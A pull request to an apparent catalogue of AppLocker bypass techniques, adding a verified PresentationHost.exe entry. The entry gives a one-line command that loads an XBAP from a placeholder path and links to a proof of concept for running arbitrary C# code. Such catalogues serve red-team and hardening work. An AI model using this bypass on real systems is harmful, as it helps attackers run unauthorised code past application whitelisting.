### PR TITLE
verified presentationhost bypass

### DIFF
--- a/README.md
+++ b/README.md
@@ -229,16 +229,17 @@ https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
 
 ## 13. PresentationHost.exe
 
-Missing Example
+`presentationhost.exe file:///x.x.x.x/bypass.xbap`
 
 Requires admin: No  
 Windows binary: Yes  
-Bypasses AppLocker Default rules: ?  
+Bypasses AppLocker Default rules: Yes  
 
 
 Notes:
 
 Links:  
+https://medium.com/@jpg.inc.au/applocker-bypass-presentationhost-exe-8c87b2354cd4
 https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
 
 

--- a/VerifiedBypasses-DefaultRules.md
+++ b/VerifiedBypasses-DefaultRules.md
@@ -7,9 +7,9 @@ Please contribute and do point out errors or resources I have forgotten.
 
 `msbuild.exe pshell.xml`
 
-Requires admin: No
+Requires admin: No  
 Windows binary: Yes  
-Bypasses AppLocker Default rules: Yes  
+Bypasses AppLocker Default rules: Yes    
 
 Notes:
 
@@ -40,7 +40,7 @@ https://oddvar.moe/2017/12/21/harden-windows-with-applocker-based-on-case-study-
 
 `presentationhost.exe file:///x.x.x.x/bypass.xbap`
 
-Requires admin: No
+Requires admin: No  
 Windows binary: Yes  
 Bypasses AppLocker Default rules: Yes  
 

--- a/VerifiedBypasses-DefaultRules.md
+++ b/VerifiedBypasses-DefaultRules.md
@@ -35,3 +35,17 @@ Notes:
 Links:  
 https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
 https://oddvar.moe/2017/12/21/harden-windows-with-applocker-based-on-case-study-part-2/
+
+## 3. Presentationhost.exe
+
+`presentationhost.exe file:///x.x.x.x/bypass.xbap`
+
+Requires admin: No
+Windows binary: Yes  
+Bypasses AppLocker Default rules: Yes  
+
+Notes:
+Must be run from the file system, the xbap can't request full permissions when loaded over HTTP/FTP
+
+Links:  
+https://medium.com/@jpg.inc.au/applocker-bypass-presentationhost-exe-8c87b2354cd4


### PR DESCRIPTION
I setup default applocker rules and verified that an xbap run from the file system (or any UNC path) can execute arbitrary c# code. I've added a link to a blog post with the steps to reproduce. 

You can reproduce the bypass by cloning https://github.com/jpginc/xbapAppWhitelistBypassPOC and running the xbap in the /powershell/bin/Debug/ folder
